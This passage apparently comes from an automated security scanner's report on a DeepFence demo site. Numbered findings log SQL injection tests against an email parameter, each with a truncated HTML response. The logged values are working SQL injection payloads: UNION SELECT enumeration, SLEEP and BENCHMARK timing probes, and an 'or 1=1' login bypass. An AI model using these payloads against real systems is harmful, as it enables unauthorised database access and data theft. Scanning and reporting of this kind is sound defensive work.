src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #827\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #828\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #829\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #830Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #831\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #832\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #833\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #834\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #835\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #836\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #837\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #838\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #839\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #840\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> 